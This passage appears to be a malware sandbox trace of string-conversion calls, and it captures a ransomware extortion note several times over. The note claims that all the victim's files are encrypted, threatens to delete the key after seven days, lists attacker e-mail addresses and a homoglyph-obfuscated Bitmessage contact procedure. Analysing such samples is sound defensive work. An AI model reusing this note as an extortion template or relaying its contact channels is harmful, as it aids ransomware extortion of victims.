\\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4b68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 